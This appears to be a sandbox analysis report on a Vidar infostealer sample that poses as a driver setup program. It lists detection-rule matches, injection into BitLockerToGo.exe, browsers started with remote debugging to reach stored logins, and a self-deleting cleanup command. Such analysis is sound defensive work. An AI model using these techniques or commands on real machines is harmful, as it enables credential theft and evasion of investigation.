Source: 0.2.dwpk5JGAxF.exe.a720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.dwpk5JGAxF.exe.a740000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.dwpk5JGAxF.exe.a680000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 3.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.dwpk5JGAxF.exe.a6e0000.3.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.dwpk5JGAxF.exe.a700000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.dwpk5JGAxF.exe.a740000.4.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.dwpk5JGAxF.exe.a720000.5.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.dwpk5JGAxF.exe.a6e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000000.00000002.1823395931.000000000A700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000000.00000002.1823913498.000000000A816000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000003.1714504161.000000000A816000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1823395931.000000000A680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000000.00000002.1823395931.000000000A6E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000000.00000002.1824125509.000000000A900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.1823395931.000000000A740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000000.00000002.1823395931.000000000A720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00404B3F	3_2_00404B3F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00415147	3_2_00415147
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_00417D56	3_2_00417D56
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_0040AF7E	3_2_0040AF7E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004171E1	3_2_004171E1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 3_2_004153AF	3_2_004153AF

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: String function: 0040D84A appears 136 times

Source: dwpk5JGAxF.exe, 00000000.00000002.1820350005.00000000012D3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameDriverFusionFreeSetup.exe< vs dwpk5JGAxF.exe
Source: dwpk5JGAxF.exe, 00000000.00000003.1714504161.000000000A7DC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs dwpk5JGAxF.exe
Source: dwpk5JGAxF.exe	Binary or memory string: OriginalFileNameDriverFusionFreeSetup.exe< vs dwpk5JGAxF.exe

Source: dwpk5JGAxF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: 0.2.dwpk5JGAxF.exe.a680000.2.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.dwpk5JGAxF.exe.a700000.1.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 3.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.dwpk5JGAxF.exe.a720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.dwpk5JGAxF.exe.a740000.4.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.dwpk5JGAxF.exe.a680000.2.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 3.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.dwpk5JGAxF.exe.a6e0000.3.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.dwpk5JGAxF.exe.a700000.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.dwpk5JGAxF.exe.a740000.4.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.dwpk5JGAxF.exe.a720000.5.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.dwpk5JGAxF.exe.a6e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.1823395931.000000000A700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.1823913498.000000000A816000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000003.1714504161.000000000A816000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1823395931.000000000A680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.1823395931.000000000A6E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.1824125509.000000000A900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.1823395931.000000000A740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000003.00000002.2314231363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.1823395931.000000000A720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@70/273@28/24

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 3_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,

3_2_0040F029

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\7DZN0O3F.htm

Source: chrome.exe, 00000007.00000002.2024197331.000051E0028E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: BitLockerToGo.exe, 00000003.00000002.2317036639.0000000005463000.00000004.00000020.00020000.00000000.sdmp, r90zmo8qi.3.dr, nop8qimgv.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: dwpk5JGAxF.exe	String found in binary or memory: net/addrselect.go
Source: dwpk5JGAxF.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go

Source: unknown	Process created: C:\Users\user\Desktop\dwpk5JGAxF.exe "C:\Users\user\Desktop\dwpk5JGAxF.exe"
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2316,i,9256415067859911694,5598517389799646016,262144 /prefetch:8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1608 --field-trial-handle=2480,i,11077060698317799847,3901179626067263456,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6728 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7176 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\iect2" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7136 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:8
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\iect2" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2316,i,9256415067859911694,5598517389799646016,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1608 --field-trial-handle=2480,i,11077060698317799847,3901179626067263456,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6728 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7176 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7136 --field-trial-handle=2020,i,68058658030323633,9361160109532157268,262144 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\dwpk5JGAxF.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
